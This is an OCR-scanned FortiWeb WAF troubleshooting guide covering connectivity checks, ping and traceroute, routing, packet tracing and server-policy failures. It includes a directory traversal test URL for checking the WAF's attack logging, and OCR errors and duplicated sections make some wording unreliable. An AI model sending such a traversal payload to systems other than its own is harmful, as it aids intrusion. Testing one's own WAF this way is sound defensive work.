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Introduction 6

Introduction

This guide is composed of the following parts:

Troubleshooting outline

This section outlines some basic concepts and skills for FortiWeb troubleshooting.

Diagnosing server-policy connectivity issues

This section focuses on troubleshooting methods and analysis steps on typical connectivity issues, including
failing to visit an access-policy in different conditions, troubleshooting failures of special return code, connecting
to backend servers failures, as well as SSL/TLS failures.

Diagnosing system issues

Critical connectivity issues are often caused by system level issues. Sometimes even though connectivity is
normal, the system resource becomes abnormal. This may cause potential issues. This section summarizes the
front-end and back-end commands to check and analyze system resources, logs, daemon, and kernel crashes.

Diagnose software function issues

This section focuses on diagnosing methods for troubleshooting functional and feature level issues, and also
summarizes some frequently asked questions (FAQ).

Diagnose hardware issues

This section focuses on troubleshooting methods for potential hardware issues related to hard disk, power
supply, SSL card, etc.

System tools & diagnose commands

This section focuses on the important diagnose commands, explaining the detailed usage and providing some
examples, but it doesn't include those commands that are listed and easy to be understood from the CLI Guide
description.
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Troubleshooting outline

Establishing a system baseline

Before you can define an abnormal operation, you need to know what normal operation is. When there is a
problem, a baseline for normal operation helps you to define what is wrong or changed.

Baseline information can include:

« Logging (see "Enabling log types, packet payload retention, &amp; resource shortage alerts" in FortiWWeb
Administration Guide.)

« Monitoring performance statistics such as memory usage (see "System Resources widget" and "SNMP
traps & queries" in FortiWeb Administration Guide.)

« Regular backups of the FortiWeb appliance's configuration (see "Backups" in FortiWWeb Administration
Guide)

If you accidentally change something, the backup can help you restore normal operation quickly and easily.
Backups also can aid in troubleshooting: you can use a tool such as diff to find the parts of the configuration that
have changed.

Determining the source of the problem

To know which solutions to try, you first need to locate the source of the problem. Occasionally, a problem has
more than one possible source. To find a working solution, you will need to determine the exact source of the
problem.

« Did FortiWeb’s hardware and software both start properly? If not, see System boot-up issues on page 40.
« Are you having Login issues? For details, see System login issues on page 44.
« What has recently changed?

Do not assume that nothing has changed in the network. Use Diff and Backups (see "Backup & restore” in
FortiWeb Administration Guide) to check if something changed in the configuration, and Logging (see
"Logging" FortiWeb Administration Guide) to check if an unusual condition occurred. If the configuration did
change, see what the effect is when you roll back the change.

« Does your configuration involve HTTPS?

If yes, make sure your certificate is loaded and valid.
« Are any web servers down?

See "Policy Status dashboard" FortiWeb Administration Guide.
« Isapolicy disabled?

« Does the problem originate on the camera, FortiWeb, or your computer? There are two sides to every
connection. For details, see Diagnosing Network Connectivity Issues.

« Does the problem affect only specific clients or servers? Are they all of the same type?

« |s the problem intermittent or random? Or can you reproduce it reliably, regardless of which camera or
computer you use to connect to FortiWeb?
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If the problem is intermittent, you can use the "System Resources widget" in FortiWeb Administration Guide
to see whether the problem corresponds to FortiWeb processor or RAM exhaustion. For details, see
Diagnosing system issues.

You can also view the event log. If there is no event log, someone may have disabled that feature. For
details, see "Enabling log types, packet payload retention, & resource shortage alerts" in FortiWeb
Administration Guide.

« Is your system under attack?
View the "Attack Log widget" in FortiWeb Administration Guide.

Planning & access privileges

Create a checklist so that you know what you have tried, and what is left to check.

If you need to contact Fortinet Technical Support, it helps to provide a list of what data you gathered and what
solutions you tried. This prevents duplicated efforts, and minimizes the time required to resolve your ticket.

If you need access to other networking equipment such as switches, routers, and servers to help you test,
contact your network administrator. Fortinet Technical Support will not have access to this other equipment.
However, they may need to ask you to adjust a setting on the other equipment.

If you are not using the admin account on FortiWeb, verify that your account has the permissions you need to
run all diagnostics.
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Diagnosing server-policy connectivity issues 9

Diagnosing server-policy connectivity issues

One of your first tests when configuring a new policy should be to determine whether allowed traffic is flowing to
your web servers.

« Isthere a server policy applied to the web server or servers FortiWeb was installed to protect? Ifitis
operating in Reverse Proxy mode, FortiWeb will not allow any traffic to reach a protected web server unless
there is a matching server policy that permits it.

« If your network utilizes secure connections (HTTPS) and there is no traffic flow, is there a problem with your
certificate?

« If you run a test attack from a browser aimed at your website, does it show up in the attack log?

To verify, configure FortiWeb to detect the attack, then craft a proof-of-concept that will trigger the attack sensor.
For example, to see whether directory traversal attacks are being logged and/or blocked, you could use your
web browser to go to:

http://www.example.com/login?user=../../../../

Under normal circumstances, you should see a new attack log entry in the attack log console widget of the
system dashboard. For details, see "Attack Log widget" in FortiWeb Administration Guide.

Diagnosing Network Connectivity Issues ... 9
Diagnosing server-poliCy aCCeSS iSSUGS ...ttt 20
Diagnosing debug flow ... ... . 27
Error codes displayed when visiting serverpolicy ... 30
Checking Attack/Traffic/Eventlogs ... 32
Forwarding non-HTTP/HTTPS traffic ......................... ... .. ... 39

Diagnosing Network Connectivity Issues

One of your first tests when configuring a new policy should be to determine whether allowed traffic is flowing to
your web servers.

« Isthere a server policy applied to the web server or servers FortiWeb was installed to protect? Ifitis
operating in Reverse Proxy mode, FortiWeb will not allow any traffic to reach a protected web server unless
there is a matching server policy that permits it.

« If your network utilizes secure connections (HTTPS) and there is no traffic flow, is there a problem with your
certificate?

« Ifyou run a test attack from a browser aimed at your website, does it show up in the attack log?
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To verify, configure FortiWeb to detect the attack, then craft a proof-of-concept that will trigger the attack sensor.
For example, to see whether directory traversal attacks are being logged and/or blocked, you could use your
web browser to go to:

http://www.example.com/login?user=../../../../

Under normal circumstances, you should see a new attack log entry in the attack log console widget of the
system dashboard.

Checking hardware connections
If there is no traffic flowing from the FortiWWeb appliance, it may be a hardware problem.

To check hardware connections

« Ensure the network cables are properly plugged in to the interfaces on the FortiWeb appliance.

« Ensure there are connection lights for the network cables on the appliance.

« Change the cable if the cable or its connector are damaged or you are unsure about the cable’s type or
quality.

« Connect the FortiWeb appliance to different hardware to see if that makes a difference.

« Inthe web Ul, go to Status > Network > Interface and ensure that the link status is up for the interface.
If the status is down (down arrow on red circle), click Bring Up next to it in the Status column.
You can also enable an interface in CLI, for example:

config system interface
edit port2
set status up
end

If any of these checks solve the problem, it was a hardware connection issue. You should still perform some
basic software tests to ensure complete connectivity.

If the hardware connections are correct and the appliance is powered on but you cannot connect using the CLI
or web Ul, you may be experiencing bootup problems. See System boot-up issues.

Examining the ARP table

When you have poor connectivity, another good place to look for information is the address resolution protocol
(ARP) table. A functioning ARP is especially important in high-availability configurations.

To check the ARP table in the CLI, enter:

diagnose network arp list

Checking routing

pingand traceroute are useful tools in network connectivity and route troubleshooting.

10
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Since you typically use these tools to troubleshoot, you can allow ICMP, the protocol used by these tools, in
firewall policies and on interfaces only when you need them. Otherwise, disable ICMP for improved security and
performance.

By default, the FortiWeb appliance will forward only HTTP/HTTPS traffic to your protected web servers. (That is,
routing/IP-based forwarding is disabled.) For information on enabling forwarding of FTP or other protocols, see
the config router settingcommand inthe FortiWeb CLI Reference:

https://docs.fortinet.com/product/fortiweb/

By default, FortiWeb appliances will respond to ping and traceroute. However, if the appliance does not
respond, and there are no firewall policies that block it, ICMP type 0 (ECHO REPSPONSE) might be effectively
disabled.

To enable ping and traceroute responses from FortiWeb

1. Goto System > Network > Interface.
To access this part of the web Ul, you must have Read and Write permission in your administrator's
account access profile to items in the Router Configuration category. For details, see "Permissions” on
page 1.

2. Inthe row for the network interface which you want to respond to ICMP type 8 (ECHO REQUEST) for ping
and UDP for traceroute, click Edit.
A dialog appears.

3. Enable PING (page 1).

Disabling PING (page 1) only prevents FortiWeb from receiving ICMP
type 8 (ECHO REQUEST) and traceroute-related UDP and responding to it.

, It does not disable FortiWeb CLI commands such as execute pingor
execute traceroute that send such traffic.

4. If Trusted Host #1 (page 1), Trusted Host #2 (page 1), and Trusted Host #3 (page 1) have been
restricted, verify that they include your computer or device’s IP address. Otherwise FortiWeb will not
respond.

5. Click OK.

The appliance should now respond when another device such as your management computer sends a
pingor traceroute to that network interface.

To verify routes between clients and your web servers

1. Attempt to connect through the FortiWeb appliance, from a client to a protected web server, via HTTP
and/or HTTPS.

If the connectivity test fails, continue to the next step.
2. Use the ping command on both the client and the server to verify that a route exists between the two. Test

traffic movement in both directions: from the client to the server, and the server to the client. Web servers
do not need to be able to initiate a connection, but must be able to send reply traffic along a return path.

ﬂ In networks using features such as asymmetric routing, routing success in
, one direction does not guarantee success in the other.
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If the routing test succeeds, continue with For application-layer problems, on the FortiWeb, examine the:
on page 12.
If the routing test fails, continue to the next step.

3. Usethe tracert or traceroute command on both the client and the server (depending on their
operating systems) to locate the point of failure along the route.
If the route is broken when it reaches the FortiWWeb appliance, first examine its network interfaces and
routes. To display network interface addresses and subnets, enter the CLI command:

show system interface

To display all recently-used routes with their priorities, enter the CLI command:

diagnose network route list

You may need to verify that the physical cabling is reliable and not loose or broken, that there are no IP
address or MAC address conflicts or blocklisting, misconfigured DNS records, and otherwise rule out
problems at the physical, network, and transport layer.
If these tests succeed, a route exists, but you cannot connect using HTTP or HTTPS, an application-layer
problem is preventing connectivity.

4. For application-layer problems, on the FortiWeb, examine the:

« matching server policy and all components it references

« certificates (if connecting via HTTPS)

« web server service/daemon (it should be running, and configured to listen on the port specified in the
server policy for HTTP and/or HTTPS, for virtual hosts, they should be configured with a correct
Host: name)

On routers and firewalls between the host and the FortiWeb appliance, verify that they permit HTTP and/or
HTTPS connectivity between them.

Testing for connectivity with ping

The ping command sends a small data packet to the destination and waits for a response. The response has a
timer that may expire, indicating that the destination is unreachable via ICMP.

ﬂ Connectivity via ICMP only proves that a route exists. It does not prove that
, connectivity also exists via other protocols at other layers such as HTTP.

ICMP is part of Layer 3 on the OSI Networking Model. ping sends Internet Control Message Protocol (ICMP)
ECHO REQUEST (“ping”) packets to the destination, and listens for ECHO RESPONSE (“pong”) packets in reply.

Some networks block ICMP packets because they can be used in a ping flood or denial of service (DoS) attack if
the network does not have anti-DoS capabilities, or because ping can be used by an attacker to find potential
targets on the network.

Beyond basic existence of a possible route between the source and destination, ping tells you the amount of
packet loss (if any), how long it takes the packet to make the round trip (latency), and the variation in that time
from packet to packet (jitter).

If ping shows some packet loss, investigate:

« cabling to eliminate loose connections
« ECMP, split horizon, or network loops
« all equipment between the ICMP source and destination to minimize hops
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If ping shows total packet loss, investigate:

« cabling to eliminate incorrect connections

- all firewalls, routers, and other devices between the two locations to verify correct IP addresses, routes,
MAC lists, trusted hosts, and policy configurations

If ping finds an outage between two points, use traceroute to locate exactly where the problem is.

To ping a device from the FortiWeb CLI

1.

FortiWeb Trouble-shooting Guide

Log in to the CLlI via either SSH, Telnet, or you can ping from the FortiWeb appliance in the CLI Console
accessed from the web UL.

If you want to adjust the behavior of execute ping, first use the execute ping optionscommand.
For details, see the FortiWeb CLI Reference:
https://docs.fortinet.com/product/fortiweb/

Enter the command:

execute ping <destination ipvé4>

where <destination ipv4> isthe IP address of the device that you want to verify that the appliance can
connectto,suchas 192.168.1.1.

To verify that routing is bidirectionally symmetric, you should also ping the

ﬂ appliance. For details, see To enable ping and traceroute responses from
, FortiWeb on page 11 and To ping a device from a Microsoft Windows
computer on page 14 or To ping a device from a Linux or Mac OS X

computer on page 14.

If the appliance can reach the host via ICMP, output similar to the following appears:

PING 192.0.2.96 (192.0.2.96): 56 data bytes

64 bytes from 192.0.2.96: icmp seq=0 ttl=253 time=6.5 ms
64 bytes from 192.0.2.96: icmp seg=1 ttl=253 time=7.4 ms
64 bytes from 192.0.2.96: icmp seg=2 ttl=253 time=6.0 ms
64 bytes from 192.0.2.96: icmp seg=3 ttl=253 time=5.5 ms
64 bytes from 192.0.2.96: icmp seg=4 ttl=253 time=7.3 ms

---192.0.2.96 ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 5.5/6.5/7.4 ms

If the appliance cannot reach the host via ICMP, output similar to the following appears:

PING 192.0.2.108 (192.0.2.108): 56 data bytes
Timeout
Timeout
Timeout
Timeout
Timeout

---192.0.2.108 ping statistics ---
5 packets transmitted, 0 packets received, 100% packet loss

“100% packet loss” and “Timeout” indicates that the host is not reachable.
For details, see the FortiWeb CLI Reference:
https://docs.fortinet.com/product/fortiweb/

13
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To ping a device from a Microsoft Windows computer

1. Click the Start (Windows logo) menu to open it.
If the host is running Windows XP, instead, go to Start > Run...

2. Type cmd then press Enter.
The Windows command line appears.

3. Enter the command:
ping <options str> <destination ipvé4>

where:

o <destination_ ipv4>isthe |IP address of the device that you want to verify that the computer can

connectto,suchas 192.0.2.1.
e <options_str>are zeroor more options, such as:
« —t—Send packets until you press Control-C.
« —a—Resolve IP addresses to domain names where possible.
« -n x—Where x is the number of packets to send.
For example, you might enter:
ping -n 5 192.0.2.1

If the computer can reach the destination, output similar to the following appears:
Pinging 192.0.2.1 with 32 bytes of data:

Reply from 192.0.2.1: bytes=32 time=7ms TTL=253
Reply from 192.0.2.1: bytes=32 time=6ms TTL=253
Reply from 192.0.2.1: bytes=32 time=1llms TTL=253
Reply from 192.0.2.1: bytes=32 time=bms TTL=253

Ping statistics for 192.0.2.1:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 5ms, Maximum = 1llms, Average = 7ms

If the computer cannot reach the destination, output similar to the following appears:
Pinging 192.0.2.1 with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 192.0.2.1:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

“100% loss” and “Request timed out.” indicates that the host is not reachable.

To ping a device from a Linux or Mac OS X computer

1. Open a command prompt.

Ay
S L4
q Alternatively, on Mac OS X, you can use the Network Utility application.

2. Enter the following command:

14
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ping <options_ str> <destination ipvé4>

where:

o <destination ipv4> isthe IP address of the device that you want to verify that the computer can
connectto,suchas 192.0.2.1.

o <options_ str> are zeroor more options, such as:

o -W y—Waity seconds for ECHO RESPONSE.

« —-c x—Where x is the number of packets to send.
If the command is not found, you can either enter the full path to the executable or add its path to your shell
environment variables. The path to the ping executable varies by distribution, but may be /bin/ping.
If you do not supply a packet count, output will continue until you terminate the command with Control-C.
For more information on options, enter man ping.
For example, you might enter:

ping -¢ 5 -W 2 192.0.2.1

If the computer can reach the destination via ICMP, output similar to the following appears:
PING 192.0.2.1 (192.0.2.1) 56(84) bytes of data.

64 bytes from 192.0.2.1: icmp seg=1 ttl=253 time=6.85 ms
64 bytes from 192.0.2.1: icmp seg=2 ttl=253 time=7.64 ms
64 bytes from 192.0.2.1: icmp seg=3 ttl=253 time=8.73 ms
64 bytes from 192.0.2.1: icmp seg=4 ttl=253 time=11.0 ms
64 bytes from 192.0.2.1: icmp seg=5 ttl=253 time=9.72 ms

---192.0.2.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 40l6ms
rtt min/avg/max/mdev = 6.854/8.804/11.072/1.495 ms

If the computer cannot reach the destination via ICMP, if you specified a wait and packet count rather than
having the command wait for your Control-C, output similar to the following appears:
PING 192.0.2.15 (192.0.2.15) 56(84) bytes of data.

---192.0.2.15 ping statistics ---

5 packets transmitted, 0 received, 100% packet loss, time 5999%ms
“"100% packet loss” indicates that the host is not reachable.

Otherwise, if you terminate by pressing Control-C (~C), output similar to the following appears:

PING 192.0.2.15 (192.0.2.15) 56(84) bytes of data.

From 192.0.2.2 icmp seqg=31 Destination Host Unreachable
From 192.0.2.2 icmp seg=30 Destination Host Unreachable
From 192.0.2.2 icmp seg=29 Destination Host Unreachable
~C

---192.0.2.15 ping statistics ---

41 packets transmitted, 0 received, +9 errors, 100% packet loss, time 40108ms

pipe 3

“100% packet loss” and “Destination Host Unreachable” indicates that the host is
not reachable.

Testing routes & latency with traceroute

traceroute sends ICMP packets to test each hop along the route. It sends three packets to the destination,
and then increases the time to live (TTL) setting by one, and sends another three packets to the destination. As
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the TTL increases, packets go one hop farther along the route until they reach the destination.

Most t raceroute commands display their maximum hop count—the maximum number of steps it will take
before declaring the destination unreachable—before they start tracing the route. The TTL setting may result in
routers or firewalls along the route timing out due to high latency.

Where ping only tells you if the signal reached its destination and returned successfully, traceroute shows
each step of its journey to its destination and how long each step takes. If you specify the destination using a
domain name, the traceroute output can also indicate DNS problems, such as an inability to connect to a
DNS server.

By default, t raceroute uses UDP with destination ports numbered from 33434 to 33534. The traceroute utility
usually has an option to specify use of ICMP ECHO REQUEST (type 8) instead, as used by the Windows
tracert utility. If you have a firewall and you want t raceroute to work from both machines (Unix-like
systems and Windows) you will need to allow both protocols inbound through your firewall (UDP ports 33434 -
33534 and ICMP type 8).

To trace the route to a device from the Forti\Web CLI

1. Loginto the CLlI via either SSH, Telnet, or you can ping from the FortiWeb appliance in the CLI Console
widget of the web UlI.

2. Enterthe command:
execute traceroute {<destination ipv4> | <destination fqdn>}

where {<destination ipv4> | <destination_ fqgdn>} is achoice of either the device’s IP address
or its fully qualified domain name (FQDN).

For example, you might enter:

execute traceroute www.example.com

If the appliance has a complete route to the destination, output similar to the following appears:
traceroute to www.fortinet.com (192.0.2.150), 32 hops max, 84 byte packets

1 192.0.2.87 0 ms O ms 0 ms

2 192.0.2.221 <static-209-87-254-221.storm.ca> 2 ms 2 ms 2 ms

3 192.0.2.129 <core-2-g0-1-1104.storm.ca> 2 ms 1 ms 2 ms

4 192.0.2.161 2 ms 2 ms 3 ms

5 192.0.2.17 <core2-ottawa23 POS13-1-0O.net.bell.ca> 3 ms 3 ms 2 ms

6 192.0.2.234 <coreZ-ottawatc POS5-0-0O.net.bell.ca> 20 ms 20 ms 20 ms

7 192.0.2.58 <cored-toronto2l POS0-12-4-0.net.bell.ca> 24 ms 21 ms 24 ms

8 192.0.2.154 <bx4-toronto63 so-2-0-0-0.net.bell.ca> 8 ms 9 ms 8 ms

9 192.0.2.145 <bx2-ashburn so2-0-0.net.bell.ca> 23 ms 23 ms 23 ms

10 192.0.2.9 23 ms 22 ms 22 ms

11 192.0.2.238 <cr2.wswdc.ip.att.net> 100 ms 192.0.2.130 <cr2.wswdc.ip.att.net>
101 ms 102 ms

12 192.0.2.21 <crl.cgcil.ip.att.net> 101 ms 100 ms 99 ms

13 192.0.2.121 <crl.sffca.ip.att.net> 100 ms 98 ms 100 ms

14 192.0.2.118 <cr8l.sj2ca.ip.att.net> 98 ms 98 ms 100 ms

15 192.0.2.105 <gar2.sj2ca.ip.att.net> 96 ms 96 ms 96 ms

16 192.0.2.42 94 ms 94 ms 94 ms

17 192.0.2.10 88 ms 87 ms 87 ms

18 192.0.2.130 90 ms 89 ms 90 ms

19 192.0.2.150 <fortinet.com> 91 ms 89 ms 91 ms

20 192.0.2.150 <fortinet.com> 91 ms 91 ms 89 ms
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Each line lists the routing hop number, the IP address and FQDN (if any) of that hop, and the 3 response
times from that hop. Typically a value of <1ms indicates a local router.

If the appliance does not have a complete route to the destination, output similar to the following appears:

traceroute to 192.0.2.1 (192.0.2.1), 32 hops max, 84 byte packets
1 192.0.2.2 0 ms 0 ms 0 ms

2 192.0.2.10 0 ms 0 ms O ms
3***
4

* Kk %

The asterisks (* ) indicate no response from that hop in the network routing. For details, see the FortiWeb
CLI Reference:

https://docs.fortinet.com/product/fortiweb/

To trace the route to a device from a Microsoft Windows computer

1. Click the Start (Windows logo) menu to open it.

If the host is running Windows XP, instead, go to Start > Run...
2. Type cmd then press Enter.

The Windows command line appears.

3. Enter the command:
tracert {<destination ipv4> | <destination fqdn>}

If the appliance has a complete route to the destination, output similar to the following appears:

Tracing route to www.fortinet.com [192.0.2.34]
over a maximum of 30 hops:

1 <1 ms <1 ms <1 ms 192.0.2.2
2 2 ms 2 ms 2 ms static-192-0-2-221.storm.ca [192.0.2.221]

32 ms 2 ms 22 ms core-2-g0-1-1104.storm.ca [192.0.2.129]

4 3 ms 3 ms 2 ms 67.69.228.161

5 3 ms 2 ms 3 ms coreZ2-ottawa23 POS13-1-0.net.bell.ca [192.0.2.17]
(Output abbreviated.)

15 97 ms 97 ms 97 ms gar2.sj2ca.ip.att.net [192.0.2.105]

16 94 ms 94 ms 94 ms 192.0.2.42

17 87 ms 87 ms 87 ms 192.0.2.10

18 89 ms 89 ms 90 ms 192.0.2.130

19 89 ms 89 ms 90 ms fortinet.com [192.0.2.34]

20 90 ms 90 ms 91 ms fortinet.com [192.0.2.34]

Trace complete.

Each line lists the routing hop number, the 3 response times from that hop, and the IP address and FQDN
(if any) of that hop. Typically a value of <1ms indicates a local router.

If the appliance does not have a complete route to the destination, output similar to the following appears:

Tracing route to 192.0.2.1 over a maximum of 30 hops

<l ms <1 ms <1 ms 192.0.2.2
<l ms <1 ms <1 ms 192.0.2.10
* * * Request timed out.

* * * Request timed out.

~C

a s w N
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The asterisks ( * ) and “Request timed out.” indicate no response from that hop in the network routing.

To trace the route to a device from a Linux or Mac OS X computer

1. Open a command prompt.

I Alternatively, on Mac OS X, you can use the Network Utility application.

2. Enter:

traceroute {<destination ipv4> | <destination fgdn>}

Note: the path to the executable may vary by distribution.

If the appliance has a complete route to the destination, output similar to the following appears:
traceroute to www.fortinet.com (192.0.2.34), 30 hops max, 60 byte packets

1

g w N

(
1

1
1
1

192.0.2.2 (192.0.2.2) 0.189 ms 0.277 ms 0.226 ms
static-192-0-2-221.storm.ca (192.0.2.221) 2.554 ms 2.549 ms 2.503 ms
core-2-g0-1-1104.storm.ca (192.0.2.129) 2.461 ms 2.516 ms 2.417 ms
192.0.2.161 (192.0.2.161) 3.041 ms 3.007 ms 2.966 ms
core2-ottawa23 POS13-1-0O.net.bell.ca (192.0.2.17) 3.004 ms 2.998 ms 2.963 ms
Output abbreviated.)
6 192.0.2.42 (192.0.2.42) 94.379 ms 94.114 ms 94.162 ms
7 192.0.2.10 (192.0.2.10) 122.879 ms 120.690 ms 119.049 ms
8 192.0.2.130 (203.78.181.130) 89.705 ms 89.411 ms 89.591 ms
9 fortinet.com (192.0.2.34) 89.717 ms 89.584 ms 89.568 ms

Each line lists the routing hop number, the IP address and FQDN (if any) of that hop, and the 3 response
times from that hop. Typically a value of <1ms indicates a local router.

If the appliance does not have a complete route to the destination, output similar to the following appears:

t
1

2
3
4

raceroute to 192.0.2.1 (192.0.2.1), 30 hops max, 60 byte packets

* Kk ok
192.0.2.10 (192.0.2.10) 4.160 ms 4.169 ms 4.144 ms
* k%

* ok *AC

The asterisks ( * ) indicate no response from that hop in the network routing.

Relatedly, if the computer's DNS query cannot resolve the host name, output similar to the following
appears:

example.lab: Name or service not known

c

annot handle "host" cmdline arg “example.lab' on position 1 (argc 1)

Examining the routing table

When a route does not exist, or when hops have high latency, examine the routing table. The routing table is
where the FortiWeb appliance caches recently used routes.

If a route

is cached in the routing table, it saves time and resources that would otherwise be required for a route

lookup. If the routing table is full and a new route must be added, the oldest, least-used route is deleted to make

room.

FortiWeb Trouble-shooting Guide
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To check the routing table in the CLI, enter:

diagnose network route list

Checking port assignments

If you are attempting to connect to FortiWeb on a given network port, and the connection is expected to occur on
a different port number, the attempt will fail. For a list of ports used by FortiWeb, see "Appendix A: Port
numbers" on page 1. For ports used by your own HTTP network services, see "Defining your network services"
on page 1.

Performing a packet trace

When troubleshooting malformed packet or protocol errors, it helps to look inside the protocol headers of
packets to determine if they are traveling along the route you expect, and with the flags and other options you
expect.

If you configure virtual servers on your FortiWeb appliance, packets’
ﬂ destination IP addresses will be those |IP addresses, not the physical IP
I addresses (i.e., the IP address of port1, etc.). An ARP update is sent out when
a virtual IP address is configured.

not egress. The nature of this deployment style is to listen only, except to reset
the TCP connection if FortiWeb detects traffic in violation.

\ﬂ For Offline Protection mode, it is usually normal if HTTP/HTTPS packets do

If the packet trace shows that packets are arriving at your FortiWeb appliance’s interfaces but no HTTP/HTTPS
packets egress, check that:

FortiWeb Trouble-shooting Guide

Physical links are firmly connected, with no loose wires

Network interfaces/bridges are brought up (see "Configuring the network interfaces" in FortiWeb
Administration Guide)

Link aggregation peers, if any, are up (see "Link aggregation” in FortiWeb Administration Guide)

VLAN IDs, if any, match (see "Adding VLAN subinterfaces" in FortiWeb Administration Guide)

Virtual servers or V-zones exist, and are enabled (see "Configuring a bridge (V-zone)" and "Configuring
virtual servers on your FortiWeb" in FortiWeb Administration Guide)

Matching policies exist, and are enabled (see "Configuring basic policies" in FortiWeb Administration
Guide)

If using HTTPS, valid server/CA certificates exist (see "How to offload or inspect HTTPS" in FortiWeb
Administration Guide)

IP-layer, and HTTP-layer routes, if necessary, match (see "Adding a gateway" and "Routing based on
HTTP content" in FortiWeb Administration Guide)

Web servers are responsive, if server health checks are configured and enabled (see "Configuring server
up/down checks" in FortiWeb Administration Guide)
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« Load balancers, if any, are defined (see "Defining your proxies, clients, & X-headers" in FortiWeb
Administration Guide)

« Clients are not blocklisted (see "Monitoring currently blocked IPs" in FortiWeb Administration Guide)

For Offline Protection mode, it is usually normal if HTTP/HTTPS packets do
not egress. The nature of this deployment style is to listen only, except to reset
l the TCP connection if FortiWeb detects traffic in violation.

If the packet is accepted by the policy but appears to be dropped during processing, see "Debugging the packet
processing flow" in FortiWeb Administration Guide.

Debugging the packet processing flow

If you have determined that network traffic is not entering and leaving the FortiWeb appliance as expected, or
not flowing through policies and scans as expected, you can debug the packet flow using the CLI.

For example, the following commands enable debug logs and the logs timestamp, and set other parameters for
debug logging:

diagnose debug enable

diagnose debug console timestamp enable
diagnose debug application proxy 7

diagnose debug flow show module-process-detail
diagnose debug flow trace start

diagnose debug flow filter server-ip 192.0.2.20

Diagnosing server-policy access issues

Server-policy access failure

1. Check if FortiWeb is accessible:

« Check the network connectivity stated in Diagnosing server-policy connectivity issues to guarantee
that Fortiwweb can be accessed from the client

« Check if DNS can be resolved successfully and correctly specified to the VIP of server-policy;

« Bypass CDN/DNS (set a host entry in local machine/pc) and check if FortiWeb VIP is accessible;
Add a host entry in local machine/pc:
Win: C:\Windows\System32\drivers\etc\hosts
Linux: /etc/hosts
Orvisitwith curl --resolve:
curl -I http://<domain> --resolve <domain>:<port>:<IP address>

2. Check configuration on FortiWeb:

o Check the opmode in show system settings; (different modes may have special limitation or
requirement)

20
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o IfHTTP & HTTPS are all enabled;
o IfHTTP/HTTPS service ports are correctly configured or can be successfully accessed;

« IfRedirect HTTP to HTTPS is enabled; (if yes, you may disable it and try whether HTTP and HTTPS
access has different response);

« If back-end server is correctly configured: pay special attention to port & SSL, single-server mode;
« IfHTTP2is enabled; (if yes, you may disable it and test again);
« If Cache&Compression are enabled; (if yes, you may disable it and test again);
« If Machine-Learning is enabled; (if yes, you may disable it and test again);
3. Check back-end server status:
« If health check is ON, check if back-end server status is up & stable;

« Ifhealth check is OFF or it's configured as single-server, visit the back-end server from a client or from
the backend shell of FortiWeb to check the actual status of back-end server;

4. Capture packets on FortiWeb:
Use GUI > System > Network > Packet Capture or tcpdump under CLI/root (or diagnose network
sniffer)to check:

« The request from client is correctly received by FortiWeb and forwarded to back-end servers;
« The TCP packets can be received and TCP connection is established;
« The SSL handshakes are successful.
o Check HTTP traffic.
5. Checkif the access is blocked by WAF modules:

« Check attack logs to see why a request is blocked: main&sub types, signature types&ID, message
details&matched pattern.

- Remove the web protection profile or features included from the server-policy, and visit again;
e Setnoparse enableinserver-policy policy tobypass WAF functions.

Notes: this option applies to Reverse Proxy or True Transparent Proxy mode only, and please do not
enable it on content routing, otherwise content routing will not work.

6. Collect diagnose output & debug logs for further support analysis:
« Turn on traffic-log with enable packet-log option to check HTTP request packet details;
« Diagnose debug flow to check traffic flow processing details;
« Capture traffic on FortiWeb at the same time and download the pcap files;
« Turn /proc/tproxy/debug levels and check packets process in kernels:
« Export configuration files and download debug logs via GUI.

Server-policy access failure

1. Check if FortiWeb is accessible:

« Check the network connectivity stated in Diagnosing server-policy connectivity issues to guarantee
that FortiWeb can be accessed from the client

« Check if DNS can be resolved successfully and correctly specified to the VIP of server-policy;

« Bypass CDN/DNS (set a host entry in local machine/pc) and check if FortiWeb VIP is accessible;
Add a host entry in local machine/pc:
Win: C:\Windows\System32\drivers\etc\hosts
Linux: /etc/hosts
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Orvisitwith curl --resolve:
curl -I http://<domain> --resolve <domain>:<port>:<IP address>

2. Check configuration on FortiWeb:

Check the opmode in show system settings; (different modes may have special limitation or
requirement)

IfHTTP & HTTPS are all enabled;
IfHTTP/HTTPS service ports are correctly configured or can be successfully accessed;

If Redirect HTTP to HTTPS is enabled; (if yes, you may disable it and try whether HTTP and HTTPS
access has different response);

If back-end server is correctly configured: pay special attention to port & SSL, single-server mode;
If HTTP2 is enabled; (if yes, you may disable it and test again);

If Cache&Compression are enabled; (if yes, you may disable it and test again);

If Machine-Learning is enabled; (if yes, you may disable it and test again);

3. Check back-end server status:

If health check is ON, check if back-end server status is up & stable;

If health check is OFF or it's configured as single-server, visit the back-end server from a client or from
the backend shell of FortiWeb to check the actual status of back-end server;

4. Capture packets on FortiWeb:
Use GUI > System > Network > Packet Capture or t cpdump under CLI/root (or diagnose network
sniffer)to check:

The request from client is correctly received by FortiWeb and forwarded to back-end servers;
The TCP packets can be received and TCP connection is established;

The SSL handshakes are successful. (Refer to SSL/TLS on page 83 for detailed troubleshooting
methods)

Check HTTP traffic. (Referto SSL/TLS on page 83 for how to decrypt SSL/TLS packets)

5. Checkif the access is blocked by WAF modules:

Check attack logs to see why a request is blocked: main&sub types, signature types&ID, message
details&matched pattern.

Remove the web protection profile or features included from the server-policy, and visit again;
Setnoparse enableinserver-policy policy tobypass WAF functions.

Notes: this option applies to Reverse Proxy or True Transparent Proxy mode only, and please do not
enable it on content routing, otherwise content routing will not work.

6. Collect diagnose output&debug logs for further analysis:

Turn on traffic-log with enable packet-log option to check HTTP request packet details;
Diagnose debug flow to check traffic flow processing details;

Capture traffic on FortiWeb at the same time and download the pcap files;

Turn /proc/tproxy/debug levels and check packets process in kernels:

Export configuration files and download debug logs via GUI.

Server policy intermittently inaccessible

1. Check if networking connection is stable:

FortiWeb Trouble-shooting Guide

Ping continuously from a remote client to see if any failures or long response time;
Ping the back-end server from FortiWeb to see if any failures or long response time;
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« Visit the back-end server continuously from a remote client to see if any failures or long response time;

« Visit the back-end server from FortiWeb to see if any failures or long response time when accessing
the server-policy from remote client fails.

2. Check if back-end servers’ status in server-pool are stable:
« If server health check is ON, check Event logs to confirm the health check down/up events;
